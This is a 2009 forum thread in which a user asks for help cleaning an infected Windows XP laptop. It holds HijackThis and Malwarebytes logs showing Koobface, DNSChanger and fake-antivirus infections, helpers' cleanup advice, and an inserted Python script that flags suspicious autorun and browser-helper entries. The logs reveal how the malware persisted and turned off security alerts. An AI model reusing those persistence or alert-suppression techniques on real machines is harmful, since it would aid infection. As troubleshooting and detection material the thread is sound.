sir_smokealot (Beginner)
19 September 2009 - 11:30 There are 32 comments and 1 solution

Help to rescue a virus-infected computer

Hi experts,

I would very much like some help rescuing my computer from various viruses and spyware.

Here is the log file from HijackThis. Hope someone can help me with it.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:01:03, on 2009-09-20
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Documents and Settings\All Users\Application Data\DatacardService\DCSHost.exe
C:\WINDOWS\sySTEM32\svchost.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\Program Files\McAfee\MSK\MskSrver.exe
C:\Program Files\s3graphics\chrome3\s3funkey.svc
C:\Program Files\s3graphics\chrome3\s3loadsv.svc
C:\WINDOWS\system32\svchost.exe
C:\Program Files\webserver\webserver.exe
C:\WINDOWS\system32\RUNDLL32.EXE
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\Program Files\SafetyCenter\new.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Samsung\Samsung EDS\EDSAgent.exe
C:\Program Files\s3graphics\chrome3\Chrome3.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Samsung\Samsung Update Plus\SUPBackGround.exe
C:\Program Files\Samsung\Samsung Battery Manager\BatteryManager.exe
C:\windows\ld14.exe
C:\Program Files\Samsung\Easy Display Manager\dmhkcore.exe
C:\windows\freddy64.exe
C:\windows\pp12.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\SAMSUNG\MagicKBD\MagicKBD.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\SAMSUNG\MagicKBD\PerformanceManager.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\OpenOffice.org 3\program\soffice.exe
C:\Program Files\OpenOffice.org 3\program\soffice.bin
C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\s3graphics\chrome3\s3funkey.svc
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {2414A739-9651-441B-BC10-D773267CC19D} - C:\DOCUME~1\YNGVER~1\LOCALS~1\Temp\~8A.dll
O2 - BHO: McAfee Phishing Filter - {27B4851A-3207-45A2-B947-BE8AFE6163AB} - c:\PROGRA~1\mcafee\msk\mskapbho.dll
O2 - BHO: scriptproxy - {7DB2D5A0-7241-4E79-B68D-6309F01C5231} - C:\Program Files\McAfee\VirusScan\scriptsn.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.2.4204.1700\swg.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_B7C5AC242193BB3E.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [EDS] C:\Program Files\Samsung\Samsung EDS\EDSAgent.exe
O4 - HKLM\..\Run: [VTTimer] ;;;VTTimer.exe
O4 - HKLM\..\Run: [Chrome3] C:\Program Files\s3graphics\chrome3\Chrome3.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [SUPBackGround] C:\Program Files\Samsung\Samsung Update Plus\SUPBackGround.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [BatteryManager] C:\Program Files\Samsung\Samsung Battery Manager\BatteryManager.exe
O4 - HKLM\..\Run: [DMHotKey] C:\Program Files\Samsung\Easy Display Manager\DMLoader.exe
O4 - HKLM\..\Run: [MagicKeyboard] C:\Program Files\SAMSUNG\MagicKBD\PreMKBD.exe
O4 - HKLM\..\Run: [mcagent_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
O4 - HKLM\..\Run: [UCam_Menu] "C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files\CyberLink\YouCam" UpdateWithCreateOnce "Software\CyberLink\YouCam\2.0"
O4 - HKLM\..\Run: [sysldtray] C:\windows\ld14.exe
O4 - HKLM\..\Run: [sysfbtray] c:\windows\freddy64.exe
O4 - HKLM\..\Run: [pp] C:\windows\pp12.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\RunOnce: [SafetyCenter] C:\Program Files\SafetyCenter\start.exe
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: OpenOffice.org 3.1.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe
O4 - Global Startup: Bluetooth.lnk = ?
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O8 - Extra context menu item: Send To Bluetooth - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {8100D56A-5661-482C-BEE8-AFECE305D968} (Facebook Photo Uploader 5 Control) - http://upload.facebook.com/controls/2009.07.28_v5.5.8.1/FacebookPhotoUploader55.cab
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour-tjänst (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: DCSHost.exe - Unknown owner - C:\Documents and Settings\All Users\Application Data\DatacardService\DCSHost.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: McAfee SiteAdvisor Service - Unknown owner - C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Program Files\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Anti-Spam Service (MSK80Service) - McAfee, Inc. - C:\Program Files\McAfee\MSK\MskSrver.exe
O23 - Service: S3Funkey - Unknown owner - C:\Program.exe (file missing)
O23 - Service: S3LoadSv - Unknown owner - C:\Program.exe (file missing)
O23 - Service: webserver - Unknown owner - C:\Program Files\webserver\webserver.exe
O23 - Service: Marvell Yukon Service (yksvc) - Unknown owner - RUNDLL32.EXE (file missing)

--
End of file - 10309 bytes
f-arn (Guru)
19 September 2009 - 11:34 #1
Download and install CCleaner http://www.ccleaner.com/ + http://www.spywarefri.dk/manualer/ccleaner-manual.htm
During installation you will be offered [Yahoo Toolbar]. You should decline it.
Let the program perform a cleanup.

  http://vistaguide.dk/?Artikler/CCleaner-GuideTilOptimeringAfVista/763

----------------

Download "Malwarebytes' Anti-Malware" here: http://www.malwarebytes.org/mbam.php
Install and start the program, update, run "Quick Scan" under the "Scanner" tab.
Afterwards click "Show results", press "Remove Selected" and post the log here together with a new HijackThis log.

NB: When you update Malwarebytes, click "Update" until it says there are no more updates.
19 September 2009 - 12:33 #2
*SIGH* Yet another [Facebook] victim

C:\windows\ld14.exe
c:\windows\freddy64.exe
C:\windows\pp12.exe
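The three files in #2 stand out because they are autorun entries pointing at executables dropped straight into the Windows root. As an added illustration (not code from this thread or from HijackThis), the script below applies that same triage heuristic to O4, O2 and O23 lines: autorun executables in the Windows root or a Temp directory, BHOs with no name or loaded from Temp, and services with no vendor. The sample lines are copied from the first log above; the section names and the severity labels are this example's own.

```python
import re
from collections import namedtuple

# Constructed sample: entries copied from the first HijackThis log in this
# thread, with a few benign entries left in for contrast.
SAMPLE_LOG = r"""
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {2414A739-9651-441B-BC10-D773267CC19D} - C:\DOCUME~1\YNGVER~1\LOCALS~1\Temp\~8A.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [sysldtray] C:\windows\ld14.exe
O4 - HKLM\..\Run: [sysfbtray] c:\windows\freddy64.exe
O4 - HKLM\..\Run: [pp] C:\windows\pp12.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: webserver - Unknown owner - C:\Program Files\webserver\webserver.exe
"""

Finding = namedtuple("Finding", "severity section name path reason")

# Line formats HijackThis uses for BHOs (O2), registry autoruns (O4) and services (O23).
O2_RE = re.compile(r"^O2 - BHO: (?P<name>.*?) - \{(?P<clsid>[0-9A-Fa-f-]+)\} - (?P<path>.+)$")
O4_RE = re.compile(r"^O4 - (?P<hive>.+?)\\\.\.\\(?P<key>\w+): \[(?P<name>[^\]]*)\] (?P<cmd>.+)$")
O23_RE = re.compile(r"^O23 - Service: (?P<name>.*?) - (?P<owner>.*?) - (?P<path>.+)$")

# An .exe sitting directly in the Windows root (C:\windows\ld14.exe) rather than
# in a subdirectory such as system32. Legitimate software almost never does this.
WINDOWS_ROOT_EXE = re.compile(r"^[a-z]:\\windows\\[^\\]+\.exe$")
# Anything loaded from a Temp directory, including the 8.3 form LOCALS~1\Temp.
TEMP_DIR = re.compile(r"\\temp\\")


def image_path(cmd):
    """Return the executable part of an O4 command line, without quotes or arguments."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split()[0]


def triage(log_text):
    """Return a list of Finding records for the suspicious entries in a HijackThis log."""
    findings = []
    for raw in log_text.splitlines():
        line = raw.strip()

        m = O4_RE.match(line)
        if m:
            path = image_path(m.group("cmd"))
            low = path.lower()
            if WINDOWS_ROOT_EXE.match(low):
                findings.append(Finding("high", "O4", m.group("name"), path,
                                        "autorun executable directly in the Windows root"))
            elif TEMP_DIR.search(low):
                findings.append(Finding("high", "O4", m.group("name"), path,
                                        "autorun executable in a Temp directory"))
            continue

        m = O2_RE.match(line)
        if m:
            reasons = []
            if m.group("name") == "(no name)":
                reasons.append("BHO without a name")
            if TEMP_DIR.search(m.group("path").lower()):
                reasons.append("BHO loaded from a Temp directory")
            if reasons:
                findings.append(Finding("high", "O2", m.group("name"), m.group("path"),
                                        "; ".join(reasons)))
            continue

        m = O23_RE.match(line)
        if m and m.group("owner") == "Unknown owner":
            # Plenty of legitimate services show no vendor (DCSHost and McAfee SiteAdvisor
            # in the log above), so this is a lead to verify, not a verdict.
            findings.append(Finding("review", "O23", m.group("name"), m.group("path"),
                                    "service without a vendor; check the file"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.severity:6}] {f.section:3} {f.name!r:24} {f.path}  <- {f.reason}")
```

Run against the full first log, the "high" findings are exactly the three Windows-root autoruns from #2 plus the unnamed BHO in Temp that the Malwarebytes log later reports as Trojan.BHO.H.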
sir_smokealot (Beginner)
19 September 2009 - 12:41 #3
Here are the two new log files

Malware:

Malwarebytes' Anti-Malware 1.41
Database version: 2775
Windows 5.1.2600 Service Pack 3

2009-09-20 12:16:57
mbam-log-2009-09-20 (12-16-57).txt

Scan type: Quick Scan
Objects scanned: 84627
Time elapsed: 6 minute(s), 13 second(s)

Memory Processes Infected: 3
Memory Modules Infected: 1
Registry Keys Infected: 9
Registry Values Infected: 5
Registry Data Items Infected: 2
Folders Infected: 2
Files Infected: 25

Memory Processes Infected:
C:\Program Files\SafetyCenter\new.exe (Trojan.SafetyCenter) -> Unloaded process successfully.
C:\Program Files\webserver\webserver.exe (Worm.KoobFace) -> Unloaded process successfully.
C:\WINDOWS\pp12.exe (Worm.KoobFace) -> Unloaded process successfully.

Memory Modules Infected:
c:\program files\ddnsfilter\ddnsfilter.dll (Trojan.DNSChanger) -> Delete on reboot.

Registry Keys Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2414a739-9651-441b-bc10-d773267cc19d} (Trojan.BHO.H) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\CLSID\{2414a739-9651-441b-bc10-d773267cc19d} (Trojan.BHO.H) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ddnsfilter (Trojan.DNSChanger) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\ddnsfilter (Trojan.DNSChanger) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ddnsfilter (Trojan.DNSChanger) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\safetycenter (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\webserver (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\webserver (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\webserver (Worm.KoobFace) -> Quarantined and deleted successfully.

Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\safetycenter (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysfbtray (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\ddnsfilter (Trojan.DNSChanger) -> Quarantined and deleted successfully.

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Folders Infected:
C:\Program Files\DDnsFilter (Trojan.DNSChanger) -> Delete on reboot.
C:\Program Files\SafetyCenter (Trojan.SafetyCenter) -> Quarantined and deleted successfully.

Files Infected:
C:\Documents and Settings\Yngve Ralph\Local Settings\Temp\~8A.dll (Trojan.BHO.H) -> Quarantined and deleted successfully.
C:\WINDOWS\ld14.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\Documents and Settings\Yngve Ralph\Local Settings\Temp\sys32.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\WINDOWS\pp11.exe (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\freddy62.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\Program Files\DDnsFilter\DDnsFilter.dll (Trojan.DNSChanger) -> Delete on reboot.
C:\Program Files\SafetyCenter\main.ico (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\SafetyCenter\new.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\SafetyCenter\protector.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\SafetyCenter\sound.wav (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\SafetyCenter\start.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\SafetyCenter\uninstall.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\webserver\webserver.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\0535251103110107106.yux (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\010112010146114103.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\010112010146116101.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\0101120101465054.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\0101120101465154.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\0101120101465254.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\0101120101465354.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\freddy63.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\freddy64.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\freddy65.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\pp12.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\ex23567.dat (KoobFace.Trace) -> Quarantined and deleted successfully.

HijackThis:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:31:19, on 2009-09-20
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Samsung\Samsung EDS\EDSAgent.exe
C:\Program Files\s3graphics\chrome3\Chrome3.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Samsung\Samsung Update Plus\SUPBackGround.exe
C:\Program Files\Samsung\Samsung Battery Manager\BatteryManager.exe
C:\Program Files\McAfee.com\Agent\mcagent.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Samsung\Easy Display Manager\dmhkcore.exe
C:\Program Files\SAMSUNG\MagicKBD\MagicKBD.exe
C:\Program Files\SAMSUNG\MagicKBD\PerformanceManager.exe
C:\Program Files\OpenOffice.org 3\program\soffice.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\OpenOffice.org 3\program\soffice.bin
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Documents and Settings\All Users\Application Data\DatacardService\DCSHost.exe
C:\Documents and Settings\All Users\Application Data\DatacardService\DCSMgr.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\Program Files\McAfee\MSK\MskSrver.exe
C:\Program Files\s3graphics\chrome3\s3funkey.svc
C:\Program Files\s3graphics\chrome3\s3loadsv.svc
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\s3graphics\chrome3\s3funkey.svc
C:\Program Files\Internet Explorer\iexplore.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: McAfee Phishing Filter - {27B4851A-3207-45A2-B947-BE8AFE6163AB} - c:\PROGRA~1\mcafee\msk\mskapbho.dll
O2 - BHO: scriptproxy - {7DB2D5A0-7241-4E79-B68D-6309F01C5231} - C:\Program Files\McAfee\VirusScan\scriptsn.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.3.4501.1418\swg.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_B7C5AC242193BB3E.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [EDS] C:\Program Files\Samsung\Samsung EDS\EDSAgent.exe
O4 - HKLM\..\Run: [VTTimer] ;;;VTTimer.exe
O4 - HKLM\..\Run: [Chrome3] C:\Program Files\s3graphics\chrome3\Chrome3.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [SUPBackGround] C:\Program Files\Samsung\Samsung Update Plus\SUPBackGround.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [BatteryManager] C:\Program Files\Samsung\Samsung Battery Manager\BatteryManager.exe
